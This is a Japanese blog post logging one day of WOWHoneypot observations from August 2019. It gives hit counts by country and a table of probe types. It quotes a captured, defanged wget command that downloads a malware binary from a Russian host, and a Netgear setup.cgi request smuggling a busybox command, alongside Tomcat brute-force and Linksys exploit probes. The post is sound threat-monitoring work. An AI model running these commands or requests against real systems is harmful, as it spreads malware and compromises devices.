23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(151日目)

2019/08/14(水)

トータルは2990件でした。

ハンティングログは以下です。

211.193.211[.]96 wget+hxxp[:]//ardp[.]hldns[.]ru/loligang.mpsl

www.virustotal.com

IPのロケーション別の件数は以下です。

アメリ 1814
中国 650
スイス 351
インド 139
ブラジル 6
トルコ 4
ロシア 3
イラン 3
グルジア 2
オランダ 2
ノルウェー 2
ブルガリア 2
バングラデシュ 2
ポーランド 1
スウェーデン 1
フランス 1
韓国 1
イラク 1
セルビア 1
チェコ 1
日本 1
ベトナム 1
タイ 1

f:id:sec23:20190815234756p:plain

件数 概要 リクエス
2946 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
37 アクセス GET /
2 phpMyAdminの調査 GET /admin-scripts.asp
1 Linksys ルータの E シリーズの脆弱性を狙った通信 POST /tmUnblock.cgi
1 不正中継の調査 HEAD hxxp[:]//112.124.42.80[:]63435/
1 クローリング HEAD /robots.txt
1 Netgearの調査 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/¤tsetting.htm=1
1 Apache Axis2の調査 GET /axis2/